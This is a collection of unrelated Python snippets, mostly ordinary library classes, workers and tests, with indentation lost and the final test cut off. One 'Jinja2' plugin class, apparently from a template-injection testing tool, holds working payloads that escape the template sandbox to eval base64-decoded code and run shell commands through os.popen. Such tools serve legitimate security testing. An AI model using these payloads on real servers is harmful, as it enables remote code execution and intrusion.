def extractAnonanemoneWordpressCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('tmpw', "The Man's Perfect Wife", 'translated'), ('DS', 'Doppio Senso', 'translated'), ('loy', 'Lady of YeonSung', 'translated'), ('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
class TimeMap():
def __init__(self):
self.track = {}
def set(self, key: str, value: str, timestamp: int) -> None:
if (key not in self.track):
self.track[key] = []
self.track[key].append((timestamp, value))
def get(self, key: str, timestamp: int) -> str:
if (key not in self.track):
return ''
values = self.track[key]
(start, end) = (0, (len(values) - 1))
while (start < end):
if (start == (end - 1)):
if (values[end][0] <= timestamp):
return values[end][1]
elif (values[start][0] <= timestamp):
return values[start][1]
else:
return ''
mid = ((start + end) // 2)
if (values[mid][0] == timestamp):
return values[mid][1]
elif (values[mid][0] > timestamp):
end = (mid - 1)
else:
start = mid
if ((start < len(values)) and (values[start][0] <= timestamp)):
return values[start][1]
elif (values[end][0] <= timestamp):
return values[end][1]
return '' |
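A short usage sketch matching the set/get contract above (get returns the value stored at the largest timestamp <= the query, or '' if none exists):
tm = TimeMap()
tm.set('foo', 'bar', 1)
tm.set('foo', 'bar2', 4)
assert tm.get('foo', 1) == 'bar'
assert tm.get('foo', 3) == 'bar'   # floor lookup falls back to timestamp 1
assert tm.get('foo', 4) == 'bar2'
assert tm.get('foo', 0) == ''      # nothing stored at or before timestamp 0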
class ImportWorkerManager(WorkerManager):
worker_prefix = 'import_worker'
def start_task(self, worker_id, task):
command = ['copr-distgit-process-import', '--daemon', '--build-id', str(task.build_id), '--worker-id', worker_id]
self.log.info('running worker: %s', ' '.join(command))
self.start_daemon_on_background(command)
def finish_task(self, worker_id, task_info):
self.get_task_id_from_worker_id(worker_id)
return True |
def test_find_peaks_raises_exception_with_min_peak_height_not_being_int_type():
data = np.random.randint(0, 10, 100)
with pytest.raises(TypeError):
scared.signal_processing.find_peaks(data, 1, 'foo')
with pytest.raises(TypeError):
scared.signal_processing.find_peaks(data, 1, None)
with pytest.raises(TypeError):
scared.signal_processing.find_peaks(data, 1, {'foo': 'bar'}) |
class ValveLogger():
def __init__(self, logger, dp_id, dp_name):
self.logger = logger
self.dp_id = dp_id
self.dp_name = dp_name
def _dpid_prefix(self, log_msg):
return ' '.join((valve_util.dpid_log(self.dp_id), self.dp_name, log_msg))
def debug(self, log_msg):
self.logger.debug(self._dpid_prefix(log_msg))
def info(self, log_msg):
self.logger.info(self._dpid_prefix(log_msg))
def error(self, log_msg):
self.logger.error(self._dpid_prefix(log_msg))
def warning(self, log_msg):
self.logger.warning(self._dpid_prefix(log_msg)) |
class AIWrapper():
cache_path_root: str = '.cache'
extra_kwargs = {'cache_seed', 'filter_func', 'allow_format_str_template', 'context', 'llm_model'}
def __init__(self, llm_client: LLMClient, output_parser: Optional[BaseOutputParser]=None):
self.llm_echo = False
self.model_cache_enable = False
self._llm_client = llm_client
self._output_parser = (output_parser or BaseOutputParser(is_stream_out=False))
    @classmethod
    def instantiate(cls, template: Optional[Union[str, Callable]]=None, context: Optional[Dict]=None, allow_format_str_template: Optional[bool]=False):
if ((not context) or (template is None)):
return template
if isinstance(template, str):
return (template.format(**context) if allow_format_str_template else template)
return template(context)
def _construct_create_params(self, create_config: Dict, extra_kwargs: Dict) -> Dict:
prompt = create_config.get('prompt')
messages = create_config.get('messages')
if ((prompt is None) == (messages is None)):
raise ValueError('Either prompt or messages should be in create config but not both.')
context = extra_kwargs.get('context')
if (context is None):
return create_config
allow_format_str_template = extra_kwargs.get('allow_format_str_template', False)
params = create_config.copy()
if (prompt is not None):
params['prompt'] = self.instantiate(prompt, context, allow_format_str_template)
elif context:
params['messages'] = [({**m, 'content': self.instantiate(m['content'], context, allow_format_str_template)} if m.get('content') else m) for m in messages]
return params
def _separate_create_config(self, config):
create_config = {k: v for (k, v) in config.items() if (k not in self.extra_kwargs)}
extra_kwargs = {k: v for (k, v) in config.items() if (k in self.extra_kwargs)}
return (create_config, extra_kwargs)
def _get_key(self, config):
non_cache_key = ['api_key', 'base_url', 'api_type', 'api_version']
copied = False
for key in non_cache_key:
if (key in config):
(config, copied) = ((config.copy() if (not copied) else config), True)
config.pop(key)
return json.dumps(config, sort_keys=True, ensure_ascii=False)
async def create(self, **config):
full_config = {**config}
(create_config, extra_kwargs) = self._separate_create_config(full_config)
params = self._construct_create_params(create_config, extra_kwargs)
cache_seed = extra_kwargs.get('cache_seed', 66)
filter_func = extra_kwargs.get('filter_func')
context = extra_kwargs.get('context')
llm_model = extra_kwargs.get('llm_model')
if context:
use_cache = context.get('use_cache', True)
if (not use_cache):
cache_seed = None
try:
response = (await self._completions_create(llm_model, params))
except LLMChatError as e:
logger.debug(f'{llm_model} generate failed!{str(e)}')
raise e
else:
pass_filter = ((filter_func is None) or filter_func(context=context, response=response))
if pass_filter:
return response
def _get_span_metadata(self, payload: Dict) -> Dict:
metadata = {k: v for (k, v) in payload.items()}
metadata['messages'] = list(map((lambda m: (m if isinstance(m, dict) else m.dict())), metadata['messages']))
return metadata
def _llm_messages_convert(self, params):
gpts_messages = params['messages']
return gpts_messages
async def _completions_create(self, llm_model, params):
payload = {'model': llm_model, 'prompt': params.get('prompt'), 'messages': self._llm_messages_convert(params), 'temperature': float(params.get('temperature')), 'max_new_tokens': int(params.get('max_new_tokens')), 'echo': self.llm_echo}
logger.info(f'''Request:
{payload}''')
span = root_tracer.start_span('Agent.llm_client.no_streaming_call', metadata=self._get_span_metadata(payload))
payload['span_id'] = span.span_id
payload['model_cache_enable'] = self.model_cache_enable
try:
model_request = _build_model_request(payload)
model_output = (await self._llm_client.generate(model_request))
parsed_output = self._output_parser.parse_model_nostream_resp(model_output, '###')
return parsed_output
except Exception as e:
logger.error(f'Call LLMClient error, {str(e)}, detail: {traceback.format_exc()}')
raise LLMChatError(original_exception=e) from e
finally:
span.end() |
class UvicornWorker(Worker):
    CONFIG_KWARGS: Dict[str, Any] = {'loop': 'auto', 'http': 'auto'}
def __init__(self, *args: Any, **kwargs: Any) -> None:
super(UvicornWorker, self).__init__(*args, **kwargs)
logger = logging.getLogger('uvicorn.error')
logger.handlers = self.log.error_log.handlers
logger.setLevel(self.log.error_log.level)
logger.propagate = False
logger = logging.getLogger('uvicorn.access')
logger.handlers = self.log.access_log.handlers
logger.setLevel(self.log.access_log.level)
logger.propagate = False
config_kwargs: dict = {'app': None, 'log_config': None, 'timeout_keep_alive': self.cfg.keepalive, 'timeout_notify': self.timeout, 'callback_notify': self.callback_notify, 'limit_max_requests': self.max_requests, 'forwarded_allow_ips': self.cfg.forwarded_allow_ips}
if self.cfg.is_ssl:
ssl_kwargs = {'ssl_keyfile': self.cfg.ssl_options.get('keyfile'), 'ssl_certfile': self.cfg.ssl_options.get('certfile'), 'ssl_keyfile_password': self.cfg.ssl_options.get('password'), 'ssl_version': self.cfg.ssl_options.get('ssl_version'), 'ssl_cert_reqs': self.cfg.ssl_options.get('cert_reqs'), 'ssl_ca_certs': self.cfg.ssl_options.get('ca_certs'), 'ssl_ciphers': self.cfg.ssl_options.get('ciphers')}
config_kwargs.update(ssl_kwargs)
if self.cfg.settings['backlog'].value:
config_kwargs['backlog'] = self.cfg.settings['backlog'].value
config_kwargs.update(self.CONFIG_KWARGS)
self.config = Config(**config_kwargs)
def init_process(self) -> None:
self.config.setup_event_loop()
super(UvicornWorker, self).init_process()
def init_signals(self) -> None:
for s in self.SIGNALS:
signal.signal(s, signal.SIG_DFL)
signal.signal(signal.SIGUSR1, self.handle_usr1)
signal.siginterrupt(signal.SIGUSR1, False)
def _install_sigquit_handler(self) -> None:
loop = asyncio.get_running_loop()
loop.add_signal_handler(signal.SIGQUIT, self.handle_exit, signal.SIGQUIT, None)
async def _serve(self) -> None:
self.config.app = self.wsgi
server = Server(config=self.config)
self._install_sigquit_handler()
(await server.serve(sockets=self.sockets))
if (not server.started):
sys.exit(Arbiter.WORKER_BOOT_ERROR)
def run(self) -> None:
return asyncio.run(self._serve())
async def callback_notify(self) -> None:
self.notify() |
class OptionPlotoptionsArearangeSonificationContexttracksMappingLowpassResonance(Options):
    @property
    def mapFunction(self):
        return self._config_get(None)
    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)
    @property
    def mapTo(self):
        return self._config_get(None)
    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)
    @property
    def max(self):
        return self._config_get(None)
    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)
    @property
    def min(self):
        return self._config_get(None)
    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)
    @property
    def within(self):
        return self._config_get(None)
    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False) |
def compile_type_def(table_name, table) -> Sql:
assert isinstance(table_name, Id)
assert (table <= T.table)
db = get_db()
posts = []
columns = []
pks = {join_names(pk) for pk in table.options.get('pk', [])}
for (name, c) in flatten_type(table):
if ((name in pks) and (c <= T.t_id)):
type_decl = db.id_type_decl
else:
type_decl = _compile_type((db.target if (db.target != mysql) else 'mysql_def'), c)
columns.append(f'{quote_name(name)} {type_decl}')
if (c <= T.t_relation):
if db.supports_foreign_key:
if (not table.options.get('temporary', False)):
rel = c.options['rel']
if rel['key']:
tbl_name = rel['table'].options['name']
s = f"FOREIGN KEY({name}) REFERENCES {quote_id(tbl_name)}({rel['column']})"
posts.append(s)
if (pks and db.supports_foreign_key):
names = ', '.join(map(quote_name, pks))
posts.append(f'PRIMARY KEY ({names})')
if (db.target == 'bigquery'):
command = ('CREATE TABLE' if table.options.get('temporary', False) else 'CREATE TABLE IF NOT EXISTS')
elif (db.target == 'oracle'):
command = ('CREATE TEMPORARY TABLE' if table.options.get('temporary', False) else 'CREATE TABLE')
else:
command = ('CREATE TEMPORARY TABLE' if table.options.get('temporary', False) else 'CREATE TABLE IF NOT EXISTS')
return RawSql(T.nulltype, ((f'{command} {quote_id(table_name)} (' + ', '.join((columns + posts))) + ')')) |
@patch('ecs_deploy.cli.get_client')
def test_deploy_runtime_platform_with_previous_value(get_client, runner):
    get_client.return_value = EcsTestClient('access_key', 'secret_key')
result = runner.invoke(cli.deploy, (CLUSTER_NAME, SERVICE_NAME, '--runtime-platform', 'ARM64', 'WINDOWS'))
expected_runtime_platform = {u'cpuArchitecture': u'ARM64', u'operatingSystemFamily': u'WINDOWS'}
assert (result.exit_code == 0)
assert (not result.exception)
assert (u'Deploying based on task definition: test-task:1' in result.output)
assert (u'Updating task definition' in result.output)
assert (str(expected_runtime_platform) in result.output)
assert (u'Successfully created revision: 2' in result.output)
assert (u'Successfully deregistered revision: 1' in result.output)
assert (u'Successfully changed task definition to: test-task:2' in result.output)
assert (u'Deployment successful' in result.output) |
def test_epoch_insta_finalize_logs(tester, concise_casper, casper_epoch_filter, new_epoch):
start_epoch = concise_casper.START_EPOCH()
new_epoch()
new_epoch()
logs = casper_epoch_filter.get_new_entries()
assert (len(logs) == 4)
log_old = logs[(- 2)]['args']
log_new = logs[(- 1)]['args']
log_fields = {'_number', '_checkpoint_hash', '_is_justified', '_is_finalized'}
assert (log_fields == log_old.keys())
assert (log_new['_number'] == (start_epoch + 2))
init_block_number = (tester.get_block_by_number('latest')['number'] - 1)
assert (Web3.toHex(log_new['_checkpoint_hash']) == tester.get_block_by_number((init_block_number - 1))['hash'])
assert (log_new['_is_justified'] is False)
assert (log_new['_is_finalized'] is False)
assert (log_old['_number'] == (start_epoch + 1))
prev_epoch_block_number = (init_block_number - concise_casper.EPOCH_LENGTH())
assert (Web3.toHex(log_old['_checkpoint_hash']) == tester.get_block_by_number((prev_epoch_block_number - 1))['hash'])
assert (log_old['_is_justified'] is True)
assert (log_old['_is_finalized'] is True) |
class StringRewriteMaskingStrategy(MaskingStrategy):
name = 'string_rewrite'
configuration_model = StringRewriteMaskingConfiguration
def __init__(self, configuration: StringRewriteMaskingConfiguration):
self.rewrite_value = configuration.rewrite_value
self.format_preservation = configuration.format_preservation
def mask(self, values: Optional[List[str]], request_id: Optional[str]) -> Optional[List[str]]:
if (values is None):
return None
masked_values: List[str] = []
for _ in range(len(values)):
if (self.format_preservation is not None):
formatter = FormatPreservation(self.format_preservation)
masked_values.append(formatter.format(self.rewrite_value))
else:
masked_values.append(self.rewrite_value)
return masked_values
def secrets_required(self) -> bool:
return False
    @classmethod
    def get_description(cls: Type[MaskingStrategy]) -> MaskingStrategyDescription:
return MaskingStrategyDescription(name=cls.name, description='Masks the input value with a default string value', configurations=[MaskingStrategyConfigurationDescription(key='rewrite_value', description='The string that will replace existing values')])
    @staticmethod
    def data_type_supported(data_type: Optional[str]) -> bool:
supported_data_types = {'string'}
return (data_type in supported_data_types) |
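Since mask only reads the two configuration attributes, a duck-typed stand-in is enough to demonstrate the behavior (SimpleNamespace here replaces the real pydantic configuration model; this substitution is an assumption for illustration):
from types import SimpleNamespace
cfg = SimpleNamespace(rewrite_value='MASKED', format_preservation=None)  # stand-in config
strategy = StringRewriteMaskingStrategy(cfg)
assert strategy.mask(['alice@example.com', 'bob'], request_id=None) == ['MASKED', 'MASKED']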
class OptionSeriesLollipopSonificationTracksMappingTremolo(Options):
    @property
    def depth(self) -> 'OptionSeriesLollipopSonificationTracksMappingTremoloDepth':
        return self._config_sub_data('depth', OptionSeriesLollipopSonificationTracksMappingTremoloDepth)
    @property
    def speed(self) -> 'OptionSeriesLollipopSonificationTracksMappingTremoloSpeed':
        return self._config_sub_data('speed', OptionSeriesLollipopSonificationTracksMappingTremoloSpeed) |
class Migration(migrations.Migration):
dependencies = [('myauth', '0001_initial'), ('django_etebase', '0001_initial')]
operations = [migrations.CreateModel(name='UserInfo', fields=[('owner', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to=settings.AUTH_USER_MODEL)), ('version', models.PositiveSmallIntegerField(default=1)), ('pubkey', models.BinaryField(editable=True)), ('salt', models.BinaryField(editable=True))])] |
def edit_catamins(save_stats: dict[(str, Any)]) -> dict[(str, Any)]:
catamins = item.IntItemGroup.from_lists(names=['Catamin A', 'Catamin B', 'Catamin C'], values=save_stats['catamins'], maxes=9999, group_name='Catamins')
catamins.edit()
save_stats['catamins'] = catamins.get_values()
return save_stats |
class CRUDCollection(Generic[T]):
__slots__ = ('_items_by_id',)
def __init__(self) -> None:
self._items_by_id = {}
def create(self, item_id: str, item: T) -> None:
if (item_id in self._items_by_id):
raise ValueError('Item with name {} already present!'.format(item_id))
self._items_by_id[item_id] = item
def read(self, item_id: str) -> Optional[T]:
return self._items_by_id.get(item_id, None)
def update(self, item_id: str, item: T) -> None:
self._items_by_id[item_id] = item
def delete(self, item_id: str) -> None:
if (item_id in self._items_by_id.keys()):
del self._items_by_id[item_id]
def read_all(self) -> List[Tuple[(str, T)]]:
return [(k, v) for (k, v) in self._items_by_id.items()]
def keys(self) -> Set[str]:
return set(self._items_by_id.keys()) |
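A brief usage sketch of the container above:
store: CRUDCollection[str] = CRUDCollection()
store.create('a', 'alpha')
store.update('a', 'ALPHA')           # update overwrites unconditionally
assert store.read('a') == 'ALPHA'
assert store.read('missing') is None
store.delete('a')
assert store.keys() == set()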
def learned_count(start_date):
if ah.user_settings['keep_log']:
ah.log.debug('Begin function')
learned = 0
    learned = mw.col.db.scalar('''
        select count() from
        (select min(id) as id
        from revlog
        where type = 0
        group by cid) as s
        where id/1000 > ?
        ''', start_date)
if (learned is None):
learned = 0
if ah.user_settings['keep_log']:
ah.log.debug(('End function returning: %s' % learned))
return learned |
class TestSQLQueryConfig():
def test_extract_query_components(self):
def found_query_keys(node: TraversalNode, values: Dict[(str, Any)]) -> Set[str]:
return set(node.typed_filtered_values(values).keys())
config = SQLQueryConfig(payment_card_node)
assert (config.field_map().keys() == {FieldPath(s) for s in ['id', 'name', 'ccn', 'customer_id', 'billing_address_id']})
assert (payment_card_node.query_field_paths == {FieldPath('id'), FieldPath('customer_id')})
assert (found_query_keys(payment_card_node, {'id': ['A'], 'customer_id': ['V'], 'ignore_me': ['X']}) == {'id', 'customer_id'})
assert (found_query_keys(payment_card_node, {'id': ['A'], 'customer_id': [], 'ignore_me': ['X']}) == {'id'})
assert (found_query_keys(payment_card_node, {'id': ['A'], 'ignore_me': ['X']}) == {'id'})
assert (found_query_keys(payment_card_node, {'ignore_me': ['X']}) == set())
assert (found_query_keys(payment_card_node, {}) == set())
def test_typed_filtered_values(self):
assert (payment_card_node.typed_filtered_values({'id': ['A'], 'customer_id': ['V'], 'ignore_me': ['X']}) == {'id': ['A'], 'customer_id': ['V']})
assert (payment_card_node.typed_filtered_values({'id': ['A'], 'customer_id': [], 'ignore_me': ['X']}) == {'id': ['A']})
assert (payment_card_node.typed_filtered_values({'id': ['A'], 'ignore_me': ['X']}) == {'id': ['A']})
assert (payment_card_node.typed_filtered_values({'id': [], 'customer_id': ['V']}) == {'customer_id': ['V']})
assert (payment_card_node.typed_filtered_values({'id': [1]}) == {'id': ['1']})
assert (payment_card_node.typed_filtered_values({'id': [1, 2]}) == {'id': ['1', '2']})
def test_generated_sql_query(self):
assert (str(SQLQueryConfig(payment_card_node).generate_query({'id': ['A'], 'customer_id': ['V'], 'ignore_me': ['X']})) == 'SELECT id,name,ccn,customer_id,billing_address_id FROM payment_card WHERE id = :id OR customer_id = :customer_id')
assert (str(SQLQueryConfig(payment_card_node).generate_query({'id': ['A'], 'customer_id': [], 'ignore_me': ['X']})) == 'SELECT id,name,ccn,customer_id,billing_address_id FROM payment_card WHERE id = :id')
assert (str(SQLQueryConfig(payment_card_node).generate_query({'id': ['A'], 'ignore_me': ['X']})) == 'SELECT id,name,ccn,customer_id,billing_address_id FROM payment_card WHERE id = :id')
assert (str(SQLQueryConfig(payment_card_node).generate_query({'id': [], 'customer_id': ['V']})) == 'SELECT id,name,ccn,customer_id,billing_address_id FROM payment_card WHERE customer_id = :customer_id')
def test_update_rule_target_fields(self, erasure_policy, example_datasets, connection_config):
dataset = Dataset(**example_datasets[0])
graph = convert_dataset_to_graph(dataset, connection_config.key)
dataset_graph = DatasetGraph(*[graph])
traversal = Traversal(dataset_graph, {'email': 'customer-'})
customer_node = traversal.traversal_node_dict[CollectionAddress('postgres_example_test_dataset', 'customer')]
rule = erasure_policy.rules[0]
config = SQLQueryConfig(customer_node)
assert (config.build_rule_target_field_paths(erasure_policy) == {rule: [FieldPath('name')]})
target = rule.targets[0]
target.data_category = DataCategory('user').value
assert (config.build_rule_target_field_paths(erasure_policy) == {rule: [FieldPath('email'), FieldPath('id'), FieldPath('name')]})
address_node = traversal.traversal_node_dict[CollectionAddress('postgres_example_test_dataset', 'address')]
config = SQLQueryConfig(address_node)
assert (config.build_rule_target_field_paths(erasure_policy) == {rule: [FieldPath(x) for x in ['city', 'house', 'street', 'state', 'zip']]})
def test_generate_update_stmt_one_field(self, erasure_policy, example_datasets, connection_config):
dataset = Dataset(**example_datasets[0])
graph = convert_dataset_to_graph(dataset, connection_config.key)
dataset_graph = DatasetGraph(*[graph])
traversal = Traversal(dataset_graph, {'email': 'customer-'})
customer_node = traversal.traversal_node_dict[CollectionAddress('postgres_example_test_dataset', 'customer')]
config = SQLQueryConfig(customer_node)
row = {'email': 'customer-', 'name': 'John Customer', 'address_id': 1, 'id': 1}
text_clause = config.generate_update_stmt(row, erasure_policy, privacy_request)
assert (text_clause.text == 'UPDATE customer SET name = :name WHERE id = :id')
assert (text_clause._bindparams['name'].key == 'name')
assert (text_clause._bindparams['name'].value is None)
def test_generate_update_stmt_length_truncation(self, erasure_policy_string_rewrite_long, example_datasets, connection_config):
dataset = Dataset(**example_datasets[0])
graph = convert_dataset_to_graph(dataset, connection_config.key)
dataset_graph = DatasetGraph(*[graph])
traversal = Traversal(dataset_graph, {'email': 'customer-'})
customer_node = traversal.traversal_node_dict[CollectionAddress('postgres_example_test_dataset', 'customer')]
config = SQLQueryConfig(customer_node)
row = {'email': 'customer-', 'name': 'John Customer', 'address_id': 1, 'id': 1}
text_clause = config.generate_update_stmt(row, erasure_policy_string_rewrite_long, privacy_request)
assert (text_clause.text == 'UPDATE customer SET name = :name WHERE id = :id')
assert (text_clause._bindparams['name'].key == 'name')
assert (text_clause._bindparams['name'].value == 'some rewrite value that is very long and')
def test_generate_update_stmt_multiple_fields_same_rule(self, erasure_policy, example_datasets, connection_config):
dataset = Dataset(**example_datasets[0])
graph = convert_dataset_to_graph(dataset, connection_config.key)
dataset_graph = DatasetGraph(*[graph])
traversal = Traversal(dataset_graph, {'email': 'customer-'})
customer_node = traversal.traversal_node_dict[CollectionAddress('postgres_example_test_dataset', 'customer')]
config = SQLQueryConfig(customer_node)
row = {'email': 'customer-', 'name': 'John Customer', 'address_id': 1, 'id': 1}
rule = erasure_policy.rules[0]
target = rule.targets[0]
target.data_category = DataCategory('user').value
rule.masking_strategy = {'strategy': 'hash', 'configuration': {'algorithm': 'SHA-512'}}
secret = MaskingSecretCache[str](secret='adobo', masking_strategy=HashMaskingStrategy.name, secret_type=SecretType.salt)
cache_secret(secret, privacy_request.id)
text_clause = config.generate_update_stmt(row, erasure_policy, privacy_request)
assert (text_clause.text == 'UPDATE customer SET email = :email,name = :name WHERE id = :id')
assert (text_clause._bindparams['name'].key == 'name')
assert (text_clause._bindparams['name'].value == HashMaskingStrategy(HashMaskingConfiguration(algorithm='SHA-512')).mask(['John Customer'], request_id=privacy_request.id)[0][0:40])
assert (text_clause._bindparams['email'].value == HashMaskingStrategy(HashMaskingConfiguration(algorithm='SHA-512')).mask(['customer-'], request_id=privacy_request.id)[0])
clear_cache_secrets(privacy_request.id)
def test_generate_update_stmts_from_multiple_rules(self, erasure_policy_two_rules, example_datasets, connection_config):
dataset = Dataset(**example_datasets[0])
graph = convert_dataset_to_graph(dataset, connection_config.key)
dataset_graph = DatasetGraph(*[graph])
traversal = Traversal(dataset_graph, {'email': 'customer-'})
row = {'email': 'customer-', 'name': 'John Customer', 'address_id': 1, 'id': 1}
customer_node = traversal.traversal_node_dict[CollectionAddress('postgres_example_test_dataset', 'customer')]
config = SQLQueryConfig(customer_node)
text_clause = config.generate_update_stmt(row, erasure_policy_two_rules, privacy_request)
assert (text_clause.text == 'UPDATE customer SET email = :email,name = :name WHERE id = :id')
assert (text_clause._bindparams['name'].value is None)
assert (text_clause._bindparams['email'].value == '*****') |
class OptionPlotoptionsDumbbellSonificationDefaultspeechoptionsMappingTime(Options):
    @property
    def mapFunction(self):
        return self._config_get(None)
    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)
    @property
    def mapTo(self):
        return self._config_get(None)
    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)
    @property
    def max(self):
        return self._config_get(None)
    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)
    @property
    def min(self):
        return self._config_get(None)
    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)
    @property
    def within(self):
        return self._config_get(None)
    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False) |
def _convert_inputs(model, X, is_train):
xp2tensorflow_ = (lambda x: xp2tensorflow(x, requires_grad=is_train))
converted = convert_recursive(is_xp_array, xp2tensorflow_, X)
if isinstance(converted, ArgsKwargs):
def reverse_conversion(dXtf):
return convert_recursive(is_tensorflow_array, tensorflow2xp, dXtf)
return (converted, reverse_conversion)
elif isinstance(converted, dict):
def reverse_conversion(dXtf):
dX = convert_recursive(is_tensorflow_array, tensorflow2xp, dXtf)
return dX.kwargs
return (ArgsKwargs(args=tuple(), kwargs=converted), reverse_conversion)
elif isinstance(converted, (tuple, list)):
def reverse_conversion(dXtf):
dX = convert_recursive(is_tensorflow_array, tensorflow2xp, dXtf)
return dX.args
return (ArgsKwargs(args=converted, kwargs={}), reverse_conversion)
else:
def reverse_conversion(dXtf):
dX = convert_recursive(is_tensorflow_array, tensorflow2xp, dXtf)
return dX.args[0]
return (ArgsKwargs(args=(converted,), kwargs={}), reverse_conversion) |
class ComponentType(str, Enum):
WORKER_MANAGER = 'dbgpt_worker_manager'
WORKER_MANAGER_FACTORY = 'dbgpt_worker_manager_factory'
MODEL_CONTROLLER = 'dbgpt_model_controller'
MODEL_REGISTRY = 'dbgpt_model_registry'
MODEL_API_SERVER = 'dbgpt_model_api_server'
MODEL_CACHE_MANAGER = 'dbgpt_model_cache_manager'
AGENT_HUB = 'dbgpt_agent_hub'
MULTI_AGENTS = 'dbgpt_multi_agents'
EXECUTOR_DEFAULT = 'dbgpt_thread_pool_default'
TRACER = 'dbgpt_tracer'
TRACER_SPAN_STORAGE = 'dbgpt_tracer_span_storage'
RAG_GRAPH_DEFAULT = 'dbgpt_rag_engine_default'
AWEL_TRIGGER_MANAGER = 'dbgpt_awel_trigger_manager'
AWEL_DAG_MANAGER = 'dbgpt_awel_dag_manager'
UNIFIED_METADATA_DB_MANAGER_FACTORY = 'dbgpt_unified_metadata_db_manager_factory' |
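Because the enum mixes in str, members compare and serialize as plain strings, which is the usual motivation for this pattern:
assert ComponentType.TRACER == 'dbgpt_tracer'
assert ComponentType.TRACER.value == 'dbgpt_tracer'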
class TestReadWrite(util.TestCase):
def test_read_write(self):
markup = '\n <input id="0">\n <textarea id="1"></textarea>\n\n <input id="2">\n <input id="3" disabled>\n\n <input id="4" type="email">\n <input id="5" type="number">\n <input id="6" type="password">\n <input id="7" type="search">\n <input id="8" type="tel">\n <input id="9" type="text">\n <input id="10" type="url">\n <input id="11" type="">\n <input id="12" type>\n\n <input id="13" type="button">\n <input id="14" type="checkbox">\n <input id="15" type="color">\n <input id="16" type="date">\n <input id="17" type="datetime-local">\n <input id="18" type="file">\n <input id="19" type="hidden">\n <input id="20" type="image">\n <input id="21" type="month">\n <input id="22" type="radio">\n <input id="23" type="range">\n <input id="24" type="reset">\n <input id="25" type="submit">\n <input id="26" type="time">\n <input id="27" type="week">\n\n <p id="28" contenteditable="">Text</p>\n <p id="29" contenteditable="true">Text</p>\n <p id="30" contenteditable="TRUE">Text</p>\n <p id="31" contenteditable="false">Text</p>\n <p id="32">Text</p>\n\n <input id="33" type="number" readonly>\n '
self.assert_selector(markup, ':read-write', ['0', '1', '2', '4', '5', '6', '7', '8', '9', '10', '11', '12', '16', '17', '21', '26', '27', '28', '29', '30'], flags=util.HTML) |
class Jinja2(python.Python):
def init(self):
self.update_actions({'render': {'render': '{{%(code)s}}', 'header': '{{%(header)s}}', 'trailer': '{{%(trailer)s}}', 'test_render': ('(%(n1)s,%(n2)s*%(n3)s)' % {'n1': rand.randints[0], 'n2': rand.randints[1], 'n3': rand.randints[2]}), 'test_render_expected': ('%(res)s' % {'res': (rand.randints[0], (rand.randints[1] * rand.randints[2]))})}, 'evaluate': {'call': 'render', 'evaluate': '\'\'}}{%% set d = "eval(__import__(\'base64\').urlsafe_b64decode(\'%(code_b64)s\'))" %%}{%% for c in [].__class__.__base__.__subclasses__() %%} {%% if c.__name__ == \'catch_warnings\' %%}\n{%% for b in c.__init__.__globals__.values() %%} {%% if b.__class__ == {}.__class__ %%}\n{%% if \'eval\' in b.keys() %%}\n{{ b[\'eval\'](d) }}\n{%% endif %%} {%% endif %%} {%% endfor %%}\n{%% endif %%} {%% endfor %%}{{\'\''}, 'execute_blind': {'call': 'inject', 'execute_blind': '{%% set d = "__import__(\'os\').popen(__import__(\'base64\').urlsafe_b64decode(\'%(code_b64)s\').decode() + \' && sleep %(delay)i\').read()" %%}{%% for c in [].__class__.__base__.__subclasses__() %%} {%% if c.__name__ == \'catch_warnings\' %%}\n{%% for b in c.__init__.__globals__.values() %%} {%% if b.__class__ == {}.__class__ %%}\n{%% if \'eval\' in b.keys() %%}\n{{ b[\'eval\'](d) }}\n{%% endif %%} {%% endif %%} {%% endfor %%}\n{%% endif %%} {%% endfor %%}'}})
self.set_contexts([{'level': 0}, {'level': 1, 'prefix': '%(closure)s}}', 'suffix': '', 'closures': python.ctx_closures}, {'level': 1, 'prefix': '%(closure)s%%}', 'suffix': '', 'closures': python.ctx_closures}, {'level': 5, 'prefix': '%(closure)s\n', 'suffix': '\n', 'closures': python.ctx_closures}, {'level': 5, 'prefix': '#}', 'suffix': '{#'}]) |
@pytest.mark.asyncio
@pytest.mark.workspace_host
class TestUpdateEmailTemplate():
async def test_unauthorized(self, unauthorized_api_assertions: HTTPXResponseAssertion, test_client_api: httpx.AsyncClient, test_data: TestData):
email_template = test_data['email_templates']['base']
response = (await test_client_api.patch(f'/email-templates/{email_template.id}', json={}))
unauthorized_api_assertions(response)
@pytest.mark.authenticated_admin
async def test_not_existing(self, test_client_api: httpx.AsyncClient, not_existing_uuid: uuid.UUID):
response = (await test_client_api.patch(f'/email-templates/{not_existing_uuid}', json={}))
assert (response.status_code == status.HTTP_404_NOT_FOUND)
@pytest.mark.parametrize('subject_input,content_input', [('', '{{ foo.bar }}'), ('{{ foo.bar }}', ''), ('', '{% if %}')])
@pytest.mark.authenticated_admin
async def test_invalid_template(self, subject_input: str, content_input: str, test_client_api: httpx.AsyncClient, test_data: TestData):
email_template = test_data['email_templates']['base']
response = (await test_client_api.patch(f'/email-templates/{email_template.id}', json={'subject': subject_input, 'content': content_input}))
assert (response.status_code == status.HTTP_400_BAD_REQUEST)
json = response.json()
assert (json['detail'] == APIErrorCode.EMAIL_TEMPLATE_INVALID_TEMPLATE)
@pytest.mark.authenticated_admin
async def test_valid(self, test_client_api: httpx.AsyncClient, test_data: TestData):
email_template = test_data['email_templates']['base']
response = (await test_client_api.patch(f'/email-templates/{email_template.id}', json={'content': 'UPDATED_CONTENT'}))
assert (response.status_code == status.HTTP_200_OK)
json = response.json()
